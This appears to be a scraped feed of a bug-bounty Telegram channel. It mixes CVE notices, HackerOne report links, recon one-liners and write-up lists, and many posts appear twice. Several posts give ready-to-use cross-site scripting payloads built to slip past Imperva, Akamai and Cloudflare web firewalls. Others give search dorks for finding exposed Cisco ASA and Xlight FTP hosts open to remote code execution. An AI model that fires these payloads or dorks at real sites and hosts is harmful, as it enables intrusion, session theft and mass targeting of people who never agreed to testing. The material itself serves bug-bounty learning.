POC for CVE-2024-4577 PHP CGI Argument Injection 🔥 🔥 🔥
Nuclei Template: https://github.com/11whoami99/CVE-2024-4577/blob/main/CVE-2024-4577.yaml
Nuclei Template: https://github.com/11whoami99/CVE-2024-4577/blob/main/CVE-2024-4577.yaml
1❤9👍2
Here are few Good GraphQl report to learn more about it.
1. hackerone.com/reports/2048725
2. hackerone.com/reports/2524939
3. hackerone.com/reports/2357012
4. hackerone.com/reports/2122671
5. hackerone.com/reports/2207248
6. hackerone.com/reports/1864188
7. hackerone.com/reports/1085332
8. hackerone.com/reports/1084904
9. hackerone.com/reports/1293377
10. hackerone.com/reports/1192460
1. hackerone.com/reports/2048725
2. hackerone.com/reports/2524939
3. hackerone.com/reports/2357012
4. hackerone.com/reports/2122671
5. hackerone.com/reports/2207248
6. hackerone.com/reports/1864188
7. hackerone.com/reports/1085332
8. hackerone.com/reports/1084904
9. hackerone.com/reports/1293377
10. hackerone.com/reports/1192460
HackerOne
Sorare disclosed on HackerOne: Circular based introspetion Query...
## Summary:
Hi Team, Hope you are doing great Sorare graphql Api has introspection enabled by default as per the policy it's meant to be public so they can facilitate their users with Graphql...
Hi Team, Hope you are doing great Sorare graphql Api has introspection enabled by default as per the policy it's meant to be public so they can facilitate their users with Graphql...
👍6❤3
Subdomain Takeover POC :
subfinder -d domain | httpx -silent > subdomains.txt ; nuclei -t /root/nuclei-templates/http/takeovers -l subdomains.txt
👍8❤1
80% bug bounties is about understanding the application/framework/protocol and (knowing about what exactly are you doing or if it's actually worth doing)
👍29🔥4🗿3❤1
CVE-2024-20329: Improper Neutralization of Command Delimiters in Cisco ASA, 9.9 rating 🔥🔥🔥
The vulnerability allows an attacker with low privileges to remotely execute commands via SSH and thus gain full control of the system.
More then 140k instances at Netlas.io:
👉 Link: https://nt.ls/Rfjme
👉 Dork: http.body:"/+CSCOE+/logon.html"
Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF
The vulnerability allows an attacker with low privileges to remotely execute commands via SSH and thus gain full control of the system.
More then 140k instances at Netlas.io:
👉 Link: https://nt.ls/Rfjme
👉 Dork: http.body:"/+CSCOE+/logon.html"
Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF
❤3🗿2👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
Gist
I’ve analyzed numerous tools, blogs, tweets, and other resources on bypassing 403 Forbidden errors using HTTP Headers Fuzzing techniques.…
I’ve analyzed numerous tools, blogs, tweets, and other resources on bypassing 403 Forbidden errors using HTTP Headers Fuzzing techniques. After extensive research, I’ve compiled a list of headers y...
1❤12👍3🗿1
⚡️Found a security vulnerability in any site?
✅Check if it has a public bug bounty program:
https://xplo1t-sec.github.io/bugbounty-lookup/
#BugBounty #bugbountytips
✅Check if it has a public bug bounty program:
https://xplo1t-sec.github.io/bugbounty-lookup/
#BugBounty #bugbountytips
1❤6🔥3🐳1
A solid XSS payload that bypasses Imperva WAF ⚙️
#infosec #cybersec #bugbountytips
<a/href="j%0A%0Davanoscript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
#infosec #cybersec #bugbountytips
1🔥9🐳3
Reflected XSS Akami Waf Bypass in Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:⚙️
/login?ReturnUrl=javanoscript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529
1🔥5👍4🐳2
Cloudflare #XSS WAF Bypass by @nav1n0x
Payload:
#cybersec #bugbountytips #infosec
Payload:
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
#cybersec #bugbountytips #infosec
1👍10🗿3🐳1
an XSS payload to bypass some waf & filters in Firefox
#infosec #cybersec #bugbountytips
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
#infosec #cybersec #bugbountytips
1❤9
Retrieves DNS records without any authentication
Replace example.com with the target domain.
curl -s "https://api.hackertarget.com/dnslookup/?q=example.com"
Replace example.com with the target domain.
26🗿12❤7👍2
Brut Security pinned «🚨 If you're looking for accurate IoT results, then Sign Up On @Netlas 😮💨 https://app.netlas.io/ref/9cc61538/»
1)Finding a Hidden GraphQL Endpoint
https://medium.com/@codingbolt.in/finding-a-hidden-graphql-endpoint-56001ab29f85
2)My 2nd bounty : Referer-based access control + Response manipulation
https://medium.com/@adebayosec/my-2nd-bounty-referer-based-access-control-response-manipulation-2ab7f54d083f
3)CSRF Bypass Using Domain Confusion Leads To ATO
https://infosecwriteups.com/csrf-bypass-using-domain-confusion-leads-to-ato-ac682dd17722
4)Linear-feedback. Shift. Register
https://cyancharley.medium.com/linear-feedback-shift-register-ac6fc3298c35
5)ASCWG Reverse Engineering challenges
https://s3dny.medium.com/ascwg-reverse-engineering-challenges-778e47a5be80
6)picoCTF: No SQL Injection
https://medium.com/@baracarlo/picoctf-no-sql-injection-93a253cc4d09
7)Sunset:1 Walkthrough
https://medium.com/@nikhilbwr34/sunset-1-walkthrough-d124d06fcc93
8)Gixposed is a powerful command-line tool designed to search the commit history of Git repositories for sensitive information, such as API keys and access tokens
https://github.com/WH1T3-E4GL3/gixposed
9)MM-ReverseIPLookup created to take a domain name and find all (A) records associated with an IP address Using Free Multiple sources,
https://github.com/FINAL094/MM-ReverseIPLookup
10)Hidden secrets and urls in JS Mass hunting || Bug bounty POC
https://www.youtube.com/watch?v=HAAG5_mSxdk
https://medium.com/@codingbolt.in/finding-a-hidden-graphql-endpoint-56001ab29f85
2)My 2nd bounty : Referer-based access control + Response manipulation
https://medium.com/@adebayosec/my-2nd-bounty-referer-based-access-control-response-manipulation-2ab7f54d083f
3)CSRF Bypass Using Domain Confusion Leads To ATO
https://infosecwriteups.com/csrf-bypass-using-domain-confusion-leads-to-ato-ac682dd17722
4)Linear-feedback. Shift. Register
https://cyancharley.medium.com/linear-feedback-shift-register-ac6fc3298c35
5)ASCWG Reverse Engineering challenges
https://s3dny.medium.com/ascwg-reverse-engineering-challenges-778e47a5be80
6)picoCTF: No SQL Injection
https://medium.com/@baracarlo/picoctf-no-sql-injection-93a253cc4d09
7)Sunset:1 Walkthrough
https://medium.com/@nikhilbwr34/sunset-1-walkthrough-d124d06fcc93
8)Gixposed is a powerful command-line tool designed to search the commit history of Git repositories for sensitive information, such as API keys and access tokens
https://github.com/WH1T3-E4GL3/gixposed
9)MM-ReverseIPLookup created to take a domain name and find all (A) records associated with an IP address Using Free Multiple sources,
https://github.com/FINAL094/MM-ReverseIPLookup
10)Hidden secrets and urls in JS Mass hunting || Bug bounty POC
https://www.youtube.com/watch?v=HAAG5_mSxdk
Medium
Finding a Hidden GraphQL Endpoint
GraphQL Vulnerability
👍7❤2
CVE-2024-46483: Integer Overflow in Xlight FTP Server, 9.8 rating 🔥
By overflowing the variable, an attacker could cause remote code execution on the host or a denial of service.
Search at Netlas.io:
👉 Link: https://nt.ls/M8D2R
👉 Dork: \*.banner:"Xlight" OR raw_tcp.response_data:"Xlight"
Read more: https://github.com/kn32/cve-2024-46483
By overflowing the variable, an attacker could cause remote code execution on the host or a denial of service.
Search at Netlas.io:
👉 Link: https://nt.ls/M8D2R
👉 Dork: \*.banner:"Xlight" OR raw_tcp.response_data:"Xlight"
Read more: https://github.com/kn32/cve-2024-46483
👍3❤2